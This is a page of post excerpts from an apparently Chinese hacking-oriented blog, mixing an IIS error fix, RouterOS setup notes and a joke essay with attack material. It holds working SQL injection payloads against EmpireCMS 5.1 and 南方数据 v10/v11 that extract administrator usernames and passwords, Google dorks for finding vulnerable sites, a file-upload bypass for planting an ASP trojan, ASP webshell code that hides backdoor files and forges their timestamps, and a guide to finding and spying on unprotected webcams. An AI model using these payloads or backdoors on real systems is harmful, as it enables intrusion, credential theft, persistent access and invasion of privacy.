Execute Access Denied

配置站点的时候发现只要给数据库里面写文件就报错。 Execute Access Denied This Virtual Directory does not allow objects to be executed. 报告这个错误,在网上翻阅资料,有的说是没有写入的权限,有的说没有执行的权限,还有的说启用父路径!后来才发现原来是在扩展里面限制动作为:GET, POST两种,应该加入成GET, HEAD, POST, TRACE这样就OK了! [IMG]upload/2009/6/200906271403445666.jpg[/IMG]...

ROS命令下查看IP

[IMG]upload/2009/6/200906261045038508.jpg[/IMG] [IMG]upload/2009/6/200906261045392635.jpg[/IMG]

设置ROS IP

安装完成后什么都没有设置的情况下. 登录 用户: admin 密码: 为空 查看已安装的网卡 >/int >pri 现在我们来配置网卡 输入“setup”,其实RouterOS任何指令你都可以缩写成头三个字母,例如 你只需要输入“set”就可以了。 setup的菜单很简单 r - reset l - load驱动 a - 配置网卡 d - 配置DHCP客户端 s - 配置DHCP服务端 p - 配置pppoe t - 配置pptp x - 退出菜单 如果你发现你配置错了,就用 set - r,或者“reset”。 ...

EmpireCMS 5.1 漏洞

帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1 然后在姓名处填: [CODE_LITE]縗\ 注意当縗\不给用时可以使用%df\替代[/CODE_LITE] 然后在联系邮箱处填[CODE_LITE],1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*[/CODE_LITE] ...

雷驰新闻发布管理系统漏洞分析

记录一下,在次感谢樱木花道指导。直接开始。先看下面的界面 [IMG]upload/2009/6/200906151155073553.jpg[/IMG] 然后先抓包分析出来uploadPic.inc.asp的路径,然后在uploadPic.inc.asp目录下输入uploadPic.asp?actionType=mod&picName=new.asp 接着开始上传张GIF格式的ASP马!上传完毕后不会返回任何信息,看下源代码里面有句 [CODE_LITE] //返回值 returnStr += "../../UploadFiles/"+document.all("imageFileName").value;[/CODE_LITE]接着就输入 ...

修改WEBSHELL后门时间

[CODE_LITE]<% '隐藏并修改文件的最后修改时间的aspshell '原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件 ' 通过shell.application可以给文件重新设置一个最后修改时间 '2009/02/24 write by skyfire response.write "
" response.write "路    径:(一定要以\结尾)
" ...

兔子,你就是一个傻B

闲了聊哈2009年河南省高考零分作文:兔子,你就是一个傻B 阅读下的材料,根据要求写一篇不少于800字的文章。         兔子是历届小动物运动会的短跑冠军,可是不会游泳。一次兔子被狼追到河边,差点被抓住。动物管理局为了小动物的全面发展,将小兔子送进游泳培训班,同班的还有小狗、小龟和小松鼠等。小狗、小龟学会游泳,又多了一种本领,心里很高兴:小兔子和小松鼠花了好长时间都没学会,很苦恼。培训班教练野鸭说:“我两条腿都能游,你们四条腿还不能游?成功的90%来自汗水。加油!呷呷!”    评论家青蛙大发感慨:“兔子擅长的是奔跑!为什么只是针对弱点训练而不发展特长呢?”思想家仙鹤说:“生存需要的本领不止一种呀!兔子学不了游泳就学打洞,松鼠学不了游泳就学爬树嘛。” ...

用google搜索毫无保护的网络摄像头

第一部分 功能强大的google浮出水面,让我们偷窥吧 近来,网上流传着一些用google搜索到的网络摄像头地址。网友们可以通过在google里面输入一段代码而捕捉到安装于世界各地的网络摄像头。并且可以调整摄像头的摄像角度和变焦来对某个物体或地方进行监视或偷窥。摄像头使用者们原本以为只有自己才能够看到的内容,在不知不觉中已经失去了安全保护,赤裸裸的暴露在互联网上。视频聊天发烧友们小心"意外"暴露   随着网络技术的发展和网络产品的普及,越来越多的网民使用摄像头,尤其是摄像头能使网友们在聊天的时候感觉距离的拉近,更有亲切感。网上已经有越来越多的视频聊天俱乐部。有些视频聊天发烧友们常聚在一起,互相通过摄像头进行肢体语言上的沟通。据了解,这些人虽然很乐于向自己很熟悉的人暴露自己,但是也拒绝向不熟的人暴露。不过google这个"法眼"一开,想不暴露也难。 ...

南方数据 注入漏洞

影响版本: v10.0 v11.0

Exploit:

http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

...

更好的隐藏webshell后门

昨天晚上奋战到2点多才拿下一个目标站!得到WEBSHELL,发现服务器上没有几个站点!而且权限还可以ASPX的话可以相互跳转目录的,为了长期运用所以打算隐藏下自己的后门,一句话、GIF图片WEBSHELL、编辑欺骗性的名字然后进行更改时间也用了!就差隐藏的方式没用了,个人认为感觉不是太好这样!今天早上上班又想弄了个根隐藏的!哈哈!看代码就知道了! [CODE_LITE] <% dim objFSO dim fdata dim objCountFile ...

«67891011121314151617181920»
控制面板
网站分类
搜索
文章归档
友情链接
最近发表
Tags列表